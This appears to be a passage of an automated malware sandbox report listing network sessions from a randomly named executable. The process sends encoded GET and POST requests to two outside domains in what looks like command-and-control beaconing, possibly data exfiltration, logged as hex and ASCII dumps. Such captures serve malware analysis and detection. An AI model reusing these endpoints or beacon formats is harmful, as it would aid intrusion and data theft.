                                                              Data Ascii: XvhP6L=+PiU2N3cRTG3eEKdxa02z2L1UE84xzZWts21XRksN6oSAlbgYlRZaPRje0jjcYna6juWtUkndYadIZ7tWsNUm7YKxXhJxXrHxU/tUjMb0+CiVDLSYFpZH/+LhFt8vy9v1J1x0zbIfOsX0IL9AYykmc9AAkaxMhzAWfObnqu+K/AsN2vmwDCtYlRcPrfGnxJWQTKxm9kSzajTYykfDbf2wFIxuCFUuSEfBPjypRBbf+xHThU1rFb/K7vbzgszyDfVglzi2zN2m2h3rr29NnH7m3R9eejj6zS14H9j6pPLnNxkAG6h4jdDxDi0AcKZcvWsjGvlbIUo0sALNH0VcHxuQMCkwT6+nJa9P8Njhd02jamXu6K8ZZ1+DQTmoW5J+EXu/0VVjUNp+GfQsAS5g3NjVQHiN5frbbQ6EiD93yqbmSiMcJzUIAM34ctQQFdKvtv6wA6/IUJctFbuZquS6Yut5gysxOcSAHv/TNWA+bVoDB/DyoHfQSX0yohS0HxSdRYQdTvL3xsobRLpcW+kNC0Jst0h1DRMjMmNCX2L7m7fjuFMkazIovzciGNmzaofljCZNrQ1W1sddXF99EUIZ7pWJveYyJWiGv7Neblae5f0cXkO4Wd6/ERBNJzimM2X4TLT94lS1ryJPOKt/wsbb+o6wVCPn5B6O6gbF3YimTU7DsqOirmx0Yal2szjD2pLAncc4d71rb2PX4ylYNkWUK5VpG7UeYk7Joyg4KTEqlFbHCTG4pl1BH1958LlN0T83caUcRFBQPJw9Bf2rKeTXCRX7UCeMK+BLCbSEExIUTBd6xwkyIg+q82MaE0g0BthzXwiDKNKdFlFjHUFqlQ+vR3hBHZzpDYb12p3YnQgQr/zmJl+8wAjINPt+POBGsKq17O8sSH1ClCyuYBV/oCxM8XIT7DLw9vQYGuw1bKUibDYAf4yPEGYGOxcUgwmnZAXOdAHpbvR9ZI4R5+A/lRhagoNhg3VyCwVwqSjReFxsss26u9bL [TRUNCATED]


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              48192.168.2.7597093.33.130.190805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:57:40.193089962 CEST447OUTGET /ufia/?Xt7D=9p4tP8lp52ndpXM&XvhP6L=zNK014zjWgi1a3eyzMMm2nz3fX543AdpgfXUQgxXNtpCBS2vIzBVVMdfG2b0NYPX0xafoGIjW7/mcYzzWPwRhMM12G8tl2rgt13dQBJV/fCpNzfTXyNrbuK5i1kogSU8patx4VfAZ+EZ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.thewhitediamond.org
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:57:40.657916069 CEST423INHTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Wed, 11 Sep 2024 20:57:40 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 283
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 58 74 37 44 3d 39 70 34 74 50 38 6c 70 35 32 6e 64 70 58 4d 26 58 76 68 50 36 4c 3d 7a 4e 4b 30 31 34 7a 6a 57 67 69 31 61 33 65 79 7a 4d 4d 6d 32 6e 7a 33 66 58 35 34 33 41 64 70 67 66 58 55 51 67 78 58 4e 74 70 43 42 53 32 76 49 7a 42 56 56 4d 64 66 47 32 62 30 4e 59 50 58 30 78 61 66 6f 47 49 6a 57 37 2f 6d 63 59 7a 7a 57 50 77 52 68 4d 4d 31 32 47 38 74 6c 32 72 67 74 31 33 64 51 42 4a 56 2f 66 43 70 4e 7a 66 54 58 79 4e 72 62 75 4b 35 69 31 6b 6f 67 53 55 38 70 61 74 78 34 56 66 41 5a 2b 45 5a 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Xt7D=9p4tP8lp52ndpXM&XvhP6L=zNK014zjWgi1a3eyzMMm2nz3fX543AdpgfXUQgxXNtpCBS2vIzBVVMdfG2b0NYPX0xafoGIjW7/mcYzzWPwRhMM12G8tl2rgt13dQBJV/fCpNzfTXyNrbuK5i1kogSU8patx4VfAZ+EZ"}</script></head></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              49192.168.2.759710199.59.243.226805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:57:46.162014961 CEST726OUTPOST /6ycu/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.personal-loans-jp8.xyz
                                                              Origin: http://www.personal-loans-jp8.xyz
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.personal-loans-jp8.xyz/6ycu/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 31 2b 50 5a 46 56 4d 77 6a 41 38 70 58 4a 38 70 78 36 6f 4a 70 77 72 33 4c 70 75 69 6d 77 67 66 4e 6a 30 71 41 30 47 6b 4c 6a 4d 73 6b 6a 6b 45 36 72 4b 4d 41 70 6d 53 36 57 42 68 52 64 68 43 6c 59 44 55 4a 31 72 42 4a 73 68 69 64 38 52 32 55 64 61 50 2b 41 34 65 51 39 7a 5a 73 46 6d 4c 51 32 66 52 62 33 77 30 2b 55 38 68 2b 6c 4d 7a 55 38 63 73 4e 38 6c 78 4b 61 5a 68 70 55 54 6e 56 5a 67 68 73 46 63 48 50 51 71 35 49 62 58 2b 72 4b 78 78 39 48 61 6d 78 4d 44 74 4d 45 33 35 41 5a 42 69 78 39 62 51 6a 6c 44 79 42 59 38 6f 43 58 55 72 36 46 73 46 76 72 38 78 6b 69 78 56 59 4d 46 57 76 77 58 48 4d 39 79 76 57 7a 32 61 4b 67 3d 3d
                                                              Data Ascii: XvhP6L=1+PZFVMwjA8pXJ8px6oJpwr3LpuimwgfNj0qA0GkLjMskjkE6rKMApmS6WBhRdhClYDUJ1rBJshid8R2UdaP+A4eQ9zZsFmLQ2fRb3w0+U8h+lMzU8csN8lxKaZhpUTnVZghsFcHPQq5IbX+rKxx9HamxMDtME35AZBix9bQjlDyBY8oCXUr6FsFvr8xkixVYMFWvwXHM9yvWz2aKg==
                                                              Sep 11, 2024 22:57:46.635189056 CEST1236INHTTP/1.1 200 OK
                                                              date: Wed, 11 Sep 2024 20:57:45 GMT
                                                              content-type: text/html; charset=utf-8
                                                              content-length: 1154
                                                              x-request-id: 8d9d543d-c140-4487-b2dd-40882d7ce6d7
                                                              cache-control: no-store, max-age=0
                                                              accept-ch: sec-ch-prefers-color-scheme
                                                              critical-ch: sec-ch-prefers-color-scheme
                                                              vary: sec-ch-prefers-color-scheme
                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QQ33dbiUXFFl3Iin/huxhj2XRM6u33IvBKXpRu59nUtDFzAxQOGyg9t72Z41OASn9AHDhpeJIv6e7FKXwKQFWQ==
                                                              set-cookie: parking_session=8d9d543d-c140-4487-b2dd-40882d7ce6d7; expires=Wed, 11 Sep 2024 21:12:46 GMT; path=/
                                                              connection: close
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 51 51 33 33 64 62 69 55 58 46 46 6c 33 49 69 6e 2f 68 75 78 68 6a 32 58 52 4d 36 75 33 33 49 76 42 4b 58 70 52 75 35 39 6e 55 74 44 46 7a 41 78 51 4f 47 79 67 39 74 37 32 5a 34 31 4f 41 53 6e 39 41 48 44 68 70 65 4a 49 76 36 65 37 46 4b 58 77 4b 51 46 57 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QQ33dbiUXFFl3Iin/huxhj2XRM6u33IvBKXpRu59nUtDFzAxQOGyg9t72Z41OASn9AHDhpeJIv6e7FKXwKQFWQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                              Sep 11, 2024 22:57:46.635238886 CEST607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOGQ5ZDU0M2QtYzE0MC00NDg3LWIyZGQtNDA4ODJkN2NlNmQ3IiwicGFnZV90aW1lIjoxNzI2MDg4Mj


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              50192.168.2.759711199.59.243.226805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:57:48.711452007 CEST746OUTPOST /6ycu/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.personal-loans-jp8.xyz
                                                              Origin: http://www.personal-loans-jp8.xyz
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.personal-loans-jp8.xyz/6ycu/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 31 2b 50 5a 46 56 4d 77 6a 41 38 70 57 70 4d 70 33 64 38 4a 76 51 72 32 4f 70 75 69 6f 51 67 62 4e 6a 34 71 41 32 72 76 4c 52 59 73 6c 48 67 45 37 75 2b 4d 48 70 6d 53 31 32 42 67 65 39 67 41 6c 59 50 32 4a 77 72 42 4a 73 31 69 64 39 42 32 55 75 43 4d 38 51 34 63 59 64 7a 62 6f 46 6d 4c 51 32 66 52 62 30 4d 4f 2b 55 30 68 2b 56 63 7a 55 65 30 6a 4f 38 6c 2b 63 4b 5a 68 2f 55 54 6a 56 5a 67 66 73 48 6f 68 50 53 53 35 49 65 54 2b 72 62 78 77 33 48 61 67 2f 73 43 70 4e 48 71 4e 43 34 39 44 7a 64 48 73 6c 53 47 51 45 75 68 4b 59 31 59 48 6b 55 55 2b 72 70 59 48 7a 45 73 67 61 4e 42 4f 69 53 6a 6d 54 4b 58 46 62 68 58 65 63 54 66 51 78 4c 4d 78 6d 70 71 45 6c 45 6d 6a 77 63 62 42 39 2f 41 3d
                                                              Data Ascii: XvhP6L=1+PZFVMwjA8pWpMp3d8JvQr2OpuioQgbNj4qA2rvLRYslHgE7u+MHpmS12Bge9gAlYP2JwrBJs1id9B2UuCM8Q4cYdzboFmLQ2fRb0MO+U0h+VczUe0jO8l+cKZh/UTjVZgfsHohPSS5IeT+rbxw3Hag/sCpNHqNC49DzdHslSGQEuhKY1YHkUU+rpYHzEsgaNBOiSjmTKXFbhXecTfQxLMxmpqElEmjwcbB9/A=
                                                              Sep 11, 2024 22:57:49.179505110 CEST1236INHTTP/1.1 200 OK
                                                              date: Wed, 11 Sep 2024 20:57:48 GMT
                                                              content-type: text/html; charset=utf-8
                                                              content-length: 1154
                                                              x-request-id: 4bf4c449-fc5c-47a9-8fac-5ecaec065082
                                                              cache-control: no-store, max-age=0
                                                              accept-ch: sec-ch-prefers-color-scheme
                                                              critical-ch: sec-ch-prefers-color-scheme
                                                              vary: sec-ch-prefers-color-scheme
                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QQ33dbiUXFFl3Iin/huxhj2XRM6u33IvBKXpRu59nUtDFzAxQOGyg9t72Z41OASn9AHDhpeJIv6e7FKXwKQFWQ==
                                                              set-cookie: parking_session=4bf4c449-fc5c-47a9-8fac-5ecaec065082; expires=Wed, 11 Sep 2024 21:12:49 GMT; path=/
                                                              connection: close
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 51 51 33 33 64 62 69 55 58 46 46 6c 33 49 69 6e 2f 68 75 78 68 6a 32 58 52 4d 36 75 33 33 49 76 42 4b 58 70 52 75 35 39 6e 55 74 44 46 7a 41 78 51 4f 47 79 67 39 74 37 32 5a 34 31 4f 41 53 6e 39 41 48 44 68 70 65 4a 49 76 36 65 37 46 4b 58 77 4b 51 46 57 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QQ33dbiUXFFl3Iin/huxhj2XRM6u33IvBKXpRu59nUtDFzAxQOGyg9t72Z41OASn9AHDhpeJIv6e7FKXwKQFWQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                              Sep 11, 2024 22:57:49.179526091 CEST607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNGJmNGM0NDktZmM1Yy00N2E5LThmYWMtNWVjYWVjMDY1MDgyIiwicGFnZV90aW1lIjoxNzI2MDg4Mj


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              51192.168.2.759712199.59.243.226805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:57:51.260771990 CEST1759OUTPOST /6ycu/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.personal-loans-jp8.xyz
                                                              Origin: http://www.personal-loans-jp8.xyz
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.personal-loans-jp8.xyz/6ycu/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 31 2b 50 5a 46 56 4d 77 6a 41 38 70 57 70 4d 70 33 64 38 4a 76 51 72 32 4f 70 75 69 6f 51 67 62 4e 6a 34 71 41 32 72 76 4c 52 41 73 6c 30 6f 45 30 70 69 4d 47 70 6d 53 38 57 42 39 65 39 67 42 6c 59 6e 79 4a 77 58 52 4a 75 4e 69 63 61 42 32 57 66 43 4d 31 51 34 63 48 74 7a 57 73 46 6d 65 51 32 75 61 62 33 6b 4f 2b 55 30 68 2b 54 59 7a 54 4d 63 6a 43 63 6c 78 4b 61 5a 58 70 55 53 45 56 5a 34 50 73 48 38 58 4f 6a 79 35 4a 2b 6a 2b 34 35 4a 77 71 58 61 69 38 73 43 50 4e 48 6d 53 43 34 78 78 7a 65 62 4b 6c 56 4b 51 46 62 39 55 45 45 41 46 7a 79 63 6c 74 71 45 48 39 53 6f 7a 62 73 6c 35 72 56 50 54 56 4a 76 6e 55 44 33 50 66 55 79 39 6a 72 73 6b 76 71 57 79 6c 51 50 45 69 35 33 34 38 71 35 39 6b 47 61 59 30 59 37 43 38 4f 67 47 35 4e 47 7a 65 4a 49 49 32 31 6f 64 54 42 4a 6c 61 2f 7a 2f 64 47 76 55 5a 5a 34 55 72 62 4f 63 78 48 42 33 6a 79 75 50 58 6e 70 48 36 47 34 69 2b 39 72 71 4f 58 4d 30 4f 44 57 4c 64 45 7a 4b 63 37 5a 74 76 5a 6a 6a 4b 4e 4d 63 41 6e 7a 43 6d 5a 37 69 4a 2f 50 [TRUNCATED]
                                                              Data Ascii: XvhP6L=1+PZFVMwjA8pWpMp3d8JvQr2OpuioQgbNj4qA2rvLRAsl0oE0piMGpmS8WB9e9gBlYnyJwXRJuNicaB2WfCM1Q4cHtzWsFmeQ2uab3kO+U0h+TYzTMcjCclxKaZXpUSEVZ4PsH8XOjy5J+j+45JwqXai8sCPNHmSC4xxzebKlVKQFb9UEEAFzycltqEH9Sozbsl5rVPTVJvnUD3PfUy9jrskvqWylQPEi5348q59kGaY0Y7C8OgG5NGzeJII21odTBJla/z/dGvUZZ4UrbOcxHB3jyuPXnpH6G4i+9rqOXM0ODWLdEzKc7ZtvZjjKNMcAnzCmZ7iJ/P39N6EOZw3SVly0TCZqF8lPezMCPp8++zlGwrnOfjlPPbT7JMntp3sk8Fw4GmpsqXitlXYfQC2LyCe2SDic3dHmAIS2b134x9J6QeCZyOgRZz43dzvKSZ7YPFjdrqIQiSMroXoAffA0R8v8TMMfp+mrF3QN54shXa96w0fX0FJ9Vw5hQZKkcjRwfu2n+re5RBOooVw8caSBqdnIuT87ori3+/Iw/V/T3MivgNW90B+AkwEi5w033NozLu3bOzSGTuTnhO5z1JvODbEqmYshyx1nCTUT7tmB6zI+ELIFmKesmGdY1b8VGTUU1ZW4x4S17Si1kJT+AOZtkI/g2a1SCKZXUYgizriwRwjsYDWSPRCJvDCIQLXaq5W6ApMDplkJL43YiOt05Vx/F+aSeTfeVHxeVZ5/qPcuGKeNkGo9UnTtSzQZzOTLC+tvaWTa1ows1u+ip1tyiF4ZlumLnaVo08NRCNiA5DgyEcr4wrbvDQZIjlW1ul4ZLxIp2+cev/AISnRdL9/x8xmsafhViG0Z16DEGjm5O+8rG4K6jg0JqdogJRo2Mlk4eHOy/VjyHdwlP4W8T+wk1Ims2h60wot4Pq2ij4sTaUn9IRLPLY9XE8YGZ96NTcqK2O1IsCmIJr6h+Eovrm7slQ7MyYApLHxKXgvAfL9t9QVIXimm [TRUNCATED]
                                                              Sep 11, 2024 22:57:51.739876032 CEST1236INHTTP/1.1 200 OK
                                                              date: Wed, 11 Sep 2024 20:57:51 GMT
                                                              content-type: text/html; charset=utf-8
                                                              content-length: 1154
                                                              x-request-id: 78f52b59-0c6c-4bba-b5aa-f91a7dd96be6
                                                              cache-control: no-store, max-age=0
                                                              accept-ch: sec-ch-prefers-color-scheme
                                                              critical-ch: sec-ch-prefers-color-scheme
                                                              vary: sec-ch-prefers-color-scheme
                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QQ33dbiUXFFl3Iin/huxhj2XRM6u33IvBKXpRu59nUtDFzAxQOGyg9t72Z41OASn9AHDhpeJIv6e7FKXwKQFWQ==
                                                              set-cookie: parking_session=78f52b59-0c6c-4bba-b5aa-f91a7dd96be6; expires=Wed, 11 Sep 2024 21:12:51 GMT; path=/
                                                              connection: close
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 51 51 33 33 64 62 69 55 58 46 46 6c 33 49 69 6e 2f 68 75 78 68 6a 32 58 52 4d 36 75 33 33 49 76 42 4b 58 70 52 75 35 39 6e 55 74 44 46 7a 41 78 51 4f 47 79 67 39 74 37 32 5a 34 31 4f 41 53 6e 39 41 48 44 68 70 65 4a 49 76 36 65 37 46 4b 58 77 4b 51 46 57 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QQ33dbiUXFFl3Iin/huxhj2XRM6u33IvBKXpRu59nUtDFzAxQOGyg9t72Z41OASn9AHDhpeJIv6e7FKXwKQFWQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                              Sep 11, 2024 22:57:51.739948988 CEST607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzhmNTJiNTktMGM2Yy00YmJhLWI1YWEtZjkxYTdkZDk2YmU2IiwicGFnZV90aW1lIjoxNzI2MDg4Mj


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              52192.168.2.759713199.59.243.226805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:57:53.805466890 CEST450OUTGET /6ycu/?XvhP6L=48n5Gh86tilVUpEn3bMYkhqvO5up5zkqTgQXBFakbnd6q0dGuIyBO7mD/1tgIewitYTTRw7cds46U990bsqw3nwlebvgtAe1RUGRB2MI0lkiowd2cOo1HMJgELRUlBXSLJgYq2E6HCqo&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.personal-loans-jp8.xyz
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:57:54.255080938 CEST1236INHTTP/1.1 200 OK
                                                              date: Wed, 11 Sep 2024 20:57:53 GMT
                                                              content-type: text/html; charset=utf-8
                                                              content-length: 1550
                                                              x-request-id: d8ff9628-c9ec-4997-8638-68d581f9d319
                                                              cache-control: no-store, max-age=0
                                                              accept-ch: sec-ch-prefers-color-scheme
                                                              critical-ch: sec-ch-prefers-color-scheme
                                                              vary: sec-ch-prefers-color-scheme
                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_sLa8zY3UhaEKNBZ46mViv+0v1W5si+fK0gfqNkaiO88r+FAaGdq/poAp36WoE4RND+cKLYprUXAmyqplZLJlrg==
                                                              set-cookie: parking_session=d8ff9628-c9ec-4997-8638-68d581f9d319; expires=Wed, 11 Sep 2024 21:12:54 GMT; path=/
                                                              connection: close
